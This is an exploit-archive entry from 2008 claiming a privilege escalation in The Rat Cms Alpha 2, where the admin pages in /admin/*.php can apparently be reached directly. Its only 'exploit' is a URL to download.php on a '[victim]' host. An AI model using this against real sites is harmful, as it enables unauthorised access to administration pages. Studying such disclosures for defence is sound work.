id: 4446
date: 12/14/2008
title: The Rat Cms Alpha 2 (download.php) Remote Vulnerability
author: x0r
cves: 

=======================================================
The Rat Cms Alpha 2 (download.php) Remote Vulnerability
=======================================================


----------------------------
The Rat Cms Alpha 2 > Priviledge Escalation
----------------------------
Autore: x0r
Download:
http://downloads.sourceforge.net/the-rat-cms/trcms_pre_alpha_2.zip?modtime=1174590953&big_mirror=0
----------------------------
Bug In: /admin/*.php

So Funny ^^ 

Exploit:

http://[victim]/admin/download.php [ just a example ^^ ]



#  0day.today [2023-03-27]  #